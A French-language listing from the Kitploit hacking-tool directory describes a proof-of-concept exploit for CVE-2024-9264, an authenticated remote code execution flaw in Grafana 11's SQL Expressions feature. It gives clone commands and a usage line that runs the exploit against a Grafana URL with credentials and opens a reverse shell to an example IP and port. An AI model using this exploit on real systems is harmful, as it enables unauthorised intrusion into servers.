Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264 — RCE authentifié dans Grafana (v11.0) via les expressions SQL - Exploit PoC | Kitploit
Outils/GitHubGitHub/rvzsec/cve-2024-9264
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

RCE authentifié dans Grafana (v11.0) via les expressions SQL - Exploit PoC

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9264

RCE authentifiée dans Grafana (v11.0) via SQL Expressions - Exploit PoC



logo

CVE-2024-9264 - Grafana v11.0
Exécution de code à distance authentifiée (RCE)

PoC


Introduction

CVE-2024-9264 est une faille critique d'exécution de code à distance et d'inclusion de fichier local introduite dans la fonctionnalité expérimentale « SQL Expressions » de Grafana 11. L'API transmet les requêtes SQL fournies par l'utilisateur directement à l'interface en ligne de commande de DuckDB sans assainissement adéquat, de sorte que tout compte authentifié disposant de privilèges Viewer ou supérieurs peut injecter des commandes shell ou lire des fichiers arbitraires, à condition que le binaire duckdb soit dans le PATH du serveur.


Utilisation

root@kitploit:~
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

Exemple :

root@kitploit:~
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
Télécharger l’outil